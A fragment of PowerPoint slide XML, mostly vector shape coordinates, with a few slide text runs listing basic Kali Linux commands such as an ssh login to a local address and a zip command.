                    <a:pt x="579090" y="759325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="148505" y="755884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="757887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173247" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="755884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="746667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="753863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="190689" y="746667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190689" y="746667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="566236" y="743837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568057" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="579090" y="743376"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="743376"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="742183"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="567017" y="743696"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567117" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="568792" y="743376"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568057" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="735999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="579090" y="735999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="735999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="493351" y="699301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446012" y="699575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="729813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493351" y="699301"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="676251" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="119816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="717724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34006" y="735237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129488" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33858" y="717464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27885" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58959" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="13726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676251" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="239902" y="719021"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="719021"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="719021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="689517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="698143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="689517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="36763" y="716949"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33858" y="717464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="679062"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129488" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="679062"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="12753" y="704584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="707029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27885" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="599138"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412439" y="650198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412439" y="707419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493351" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485128" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419206" y="687840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470321" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="613774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="704584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="704584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="441092" y="699301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446012" y="699575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="232850" y="689517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="698143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="685334"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="419206" y="687840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="444531" y="681927"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485128" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444531" y="681927"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="657513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="664836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="470321" y="657513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470321" y="657513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="701190" y="597833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="597833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="597833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="25716"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="127162"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="134507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="58959" y="127162"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58959" y="127162"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="19720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="19720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="19720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="17221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676880" y="17678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="17221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="672182" y="17221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676880" y="17678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221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63" name="object 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9166EB-816A-EB9F-AD1F-4375473D82AF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2508" y="3847360"/>
              <a:ext cx="526589" cy="537970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBD508F-F5E3-0306-02BE-CBCBABD104CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2589906" y="3421870"/>
              <a:ext cx="2054860" cy="878840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2054860" h="878839">
                  <a:moveTo>
                    <a:pt x="2049737" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="867154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4754" y="878391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054492" y="11236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049737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5" name="object 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4852FDF4-1893-71F9-37F6-896763C61A67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6786372" y="3220212"/>
              <a:ext cx="381000" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="381000" h="288289">
                  <a:moveTo>
                    <a:pt x="236981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236981" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236981" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236981" y="288036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="144018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369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6" name="object 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36C238FA-7E24-8356-9EEB-E0EDD81C5B65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6786372" y="3220212"/>
              <a:ext cx="381000" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="381000" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="72008"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236981" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236981" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="144018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236981" y="288036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236981" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72008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63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E6E708-5232-471C-F562-AEB42E852665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8" name="object 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4888E27C-D01F-DB6C-04CC-22C2664EAC34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109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5899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9B70-E606-EFA6-94A3-4FD6ABCE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2D1BC-0A2B-1630-005E-1C833B76D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924EB5C-72A0-F491-04E1-4AE442A5CF3F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679F371-1A73-5B7D-9916-F6F65465ABC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B0CC46D-FD9E-6CFA-195D-75FA4E538BC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11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EB5756C-F19A-5CC4-4F54-3C8EDC30A871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171A99C9-2B74-A85E-528C-7CAFDBB8C1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C7D667D2-C6EC-4D23-60E7-1D1516726ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="1034105"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13716" y="1034796"/>
            <a:chExt cx="9173210" cy="334708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BAE7426B-8067-2861-9C96-EA1AED3866BF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37D5A5F9-165E-31E4-CEA3-31DAC128CE73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D3CD3B72-D7DA-89DD-5E30-0268CD9FC6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ED10612D-7674-3973-0C9C-BFA5FB601450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CA3E26DF-4E09-E579-CAA7-9B996A759314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8313B098-4D2E-A83F-9DD8-6DF96EA40ABB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11</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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8B0887E0-DAC2-1D60-3700-0748C9AB722B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1.2 All Kali Linux commands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6A4A41F4-4D25-8691-2073-4B7C77DF0728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382677" y="1498401"/>
            <a:ext cx="29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-ssh root@192.168.1.10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51A25-1092-CD63-9BA4-4AA74A3EFB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267772" y="1698437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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4454A952-F5BC-D1D6-F3FC-D036B7A2B3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638750" y="1482383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Login website by ssh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3320734C-8DD2-A7DF-0126-2946AF90CD2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578623" y="1919642"/>
            <a:ext cx="341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-zip archive.zip file1.txt file2.txt     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AD0ADE-D305-378A-C8B4-4AA42A0997F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4024174" y="2107435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52">
            <a:extLst>
